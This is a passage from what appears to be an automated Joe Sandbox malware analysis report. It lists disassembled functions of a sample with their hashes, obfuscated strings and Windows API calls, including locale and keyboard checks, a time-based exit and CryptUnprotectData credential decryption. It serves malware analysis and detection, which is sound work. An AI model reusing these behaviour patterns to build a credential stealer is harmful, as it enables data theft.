                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID:
                                  • API String ID: 2567437900-0
                                  • Opcode ID: cd29cac9afa117dc4ad5e2aeb8b9803dfc4957d20025b4b72e7bef7ba819acf3
                                  • Instruction ID: b1882de03b731a147753538582471c2affc6d4c91326510e25045969a6a94997
                                  • Opcode Fuzzy Hash: cd29cac9afa117dc4ad5e2aeb8b9803dfc4957d20025b4b72e7bef7ba819acf3
                                  • Instruction Fuzzy Hash: AF312E31531656DBDB22FF24ED85FDF77A5AF40354F200229B849AB251CB30DC258B90
                                  Function 0065BA5A Relevance: 11.6, Strings: 8, Instructions: 1624COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $o}$%rn/$&_l/$-R)$/Z}c$kk=l$vo^$=}
                                  • API String ID: 0-2929429453
                                  • Opcode ID: 926ca04cd0f1e724cb455502cd965171bd28ecdb0c7164e06b6c9de8eacd832d
                                  • Instruction ID: bf5e7a001c76949cd239970c5499816045d9328c05f11ef5d5d3a483a42daafd
                                  • Opcode Fuzzy Hash: 926ca04cd0f1e724cb455502cd965171bd28ecdb0c7164e06b6c9de8eacd832d
                                  • Instruction Fuzzy Hash: 35B2D6F360C2009FE308AE29EC8567AF7E5EFD4720F1A893DE6C5C7744EA3558418696
                                  Function 0065D4F8 Relevance: 11.6, Strings: 8, Instructions: 1606COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &n[w$0Y.$X3_e$Y#$tT~u$v~]$.C_$:~
                                  • API String ID: 0-1707199500
                                  • Opcode ID: 9da7401f7879548a6792cd2d1905939d045638f22de76b58dfe1e12307f17dc2
                                  • Instruction ID: cc74cb8f3075e690ce7aad0443bf68efed783ba93803304168b8cd80ea418fef
                                  • Opcode Fuzzy Hash: 9da7401f7879548a6792cd2d1905939d045638f22de76b58dfe1e12307f17dc2
                                  • Instruction Fuzzy Hash: 0EB206F360C2009FE308AE2DEC8567ABBE5EF94720F16893DE6C587744E63598418797
                                  Function 002D2D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 002D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 002D71FE
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 002D2D9B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 002D2DAD
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 002D2DBA
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 002D2DEC
                                  • LocalFree.KERNEL32(00000000), ref: 002D2FCA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: a1d045ec8030f8ecb56cc95b0338c7204a164f9ad3786934ce29274061479f49
                                  • Instruction ID: 87adbf059bec1df2ac5ff7f0c7044a6772b7d5dc208f7c779159a457309e0221
                                  • Opcode Fuzzy Hash: a1d045ec8030f8ecb56cc95b0338c7204a164f9ad3786934ce29274061479f49
                                  • Instruction Fuzzy Hash: FAB11771910205CFD715CF18C988B99B7F1FB44325F29C5AAD408AB3A2D776AD96CF80
                                  Function 00664102 Relevance: 10.4, Strings: 7, Instructions: 1629COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: f{$'kV}$-e]K$?sKf$MG]o$su7|$uYz
                                  • API String ID: 0-1046906218
                                  • Opcode ID: aa35f23f319291e8736ea33baad57934535ee50f37b1b8843a65c07afde705ff
                                  • Instruction ID: 2731a8470de025cce313df8b7328e987bcf0672c630de3fb4934f0e46cb2b5ba
                                  • Opcode Fuzzy Hash: aa35f23f319291e8736ea33baad57934535ee50f37b1b8843a65c07afde705ff
                                  • Instruction Fuzzy Hash: 70B247F3A0C2049FE3046E2DEC8567AFBE9EF94360F1A463DEAC4C7744E63558058696
                                  Function 002D2C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 002D2C42
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D2C49
                                  • GetTimeZoneInformation.KERNEL32(?), ref: 002D2C58
                                  • wsprintfA.USER32 ref: 002D2C83
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID: wwww
                                  • API String ID: 3317088062-671953474
                                  • Opcode ID: 9a34700c6d32762f90d6b625a32934e4e73448a629d9a2d24e251656dd9c80a8
                                  • Instruction ID: 317c8caca9f877fe95b3b06391fe99553e5b1650243af71c3f24431b5fb7b1ab
                                  • Opcode Fuzzy Hash: 9a34700c6d32762f90d6b625a32934e4e73448a629d9a2d24e251656dd9c80a8
                                  • Instruction Fuzzy Hash: 14017671A00244ABCB288F58CC4AFAEBB3DEB84720F00432AF816CB3C0D7701D008AE5
                                  Function 006677BD Relevance: 7.8, Strings: 5, Instructions: 1558COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: C;cp$Z+lw$b7u$dB>$zb8?
                                  • API String ID: 0-2234502678
                                  • Opcode ID: e3a2027bde2bab8c0270478f82e151174a595a7c394a42f581645c2e04c9d618
                                  • Instruction ID: 64ce2a1f1a74e86b738a6200127ac3ab09f43cb9a9d62b1979c0fc700ce81a13
                                  • Opcode Fuzzy Hash: e3a2027bde2bab8c0270478f82e151174a595a7c394a42f581645c2e04c9d618
                                  • Instruction Fuzzy Hash: 09B216B360C2049FE304AE29EC8567AFBE9EF94720F16893DE6C4C7344E63598458797
                                  Function 002D1B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 002D1B72
                                    • Part of subcall function 002D1820: lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D184F
                                    • Part of subcall function 002D1820: lstrlen.KERNEL32(011B7308), ref: 002D1860
                                    • Part of subcall function 002D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 002D1887
                                    • Part of subcall function 002D1820: lstrcat.KERNEL32(00000000,00000000), ref: 002D1892
                                    • Part of subcall function 002D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 002D18C1
                                    • Part of subcall function 002D1820: lstrlen.KERNEL32(002E4FA0), ref: 002D18D3
                                    • Part of subcall function 002D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 002D18F4
                                    • Part of subcall function 002D1820: lstrcat.KERNEL32(00000000,002E4FA0), ref: 002D1900
                                    • Part of subcall function 002D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 002D192F
                                  • sscanf.NTDLL ref: 002D1B9A
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 002D1BB6
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 002D1BC6
                                  • ExitProcess.KERNEL32 ref: 002D1BE3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 3040284667-0
                                  • Opcode ID: da18991eff51aaf2c928680c89c5054d5ac49df2e2ed40cf820080630d7557c4
                                  • Instruction ID: 44d9e83fbaba3d8402eefa07098b5674bd93a3e16d126abf7571ed59c430e648
                                  • Opcode Fuzzy Hash: da18991eff51aaf2c928680c89c5054d5ac49df2e2ed40cf820080630d7557c4
                                  • Instruction Fuzzy Hash: BB21E2B1518341AF8350DF69D88485BBBF9EFC8214F408A1EF599C7261E730D9188BA6
                                  Function 002B7750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 002B775E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B7765
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 002B778D
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 002B77AD
                                  • LocalFree.KERNEL32(?), ref: 002B77B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 6044259af74b2383bb28ebcc14b222181bbe1e567035bc0eaeaa2ff6d3aef5aa
                                  • Instruction ID: 6df5b92e8e53110b62ee29fe30b6d194788e6351474049781ce081fa131bc64a
                                  • Opcode Fuzzy Hash: 6044259af74b2383bb28ebcc14b222181bbe1e567035bc0eaeaa2ff6d3aef5aa
                                  • Instruction Fuzzy Hash: 6B011E75B40309BBEB10DBA49C4AFEA7B78EB44B11F104155FA09EA2C1DAB0AD00CB94
                                  Function 0065F401 Relevance: 7.5, Strings: 5, Instructions: 1299COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: '|n7$(@:l$IwXd$m-?${Qoo
                                  • API String ID: 0-80761592
                                  • Opcode ID: 63e1f66de1c3cf3d5083b381ce994ea8a5208202d6777e6543b0ac426c7d354c
                                  • Instruction ID: 14ed08a0155efb75ff0dd29653711d7819fa1a3fffcf1d6cb374e9727923cc96
                                  • Opcode Fuzzy Hash: 63e1f66de1c3cf3d5083b381ce994ea8a5208202d6777e6543b0ac426c7d354c
                                  • Instruction Fuzzy Hash: A292F7F390C2049FE304AE2DEC8566AF7E9EF94720F1A492DEAC4C7744E63598058796
                                  Function 0066954B Relevance: 6.3, Strings: 4, Instructions: 1332COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
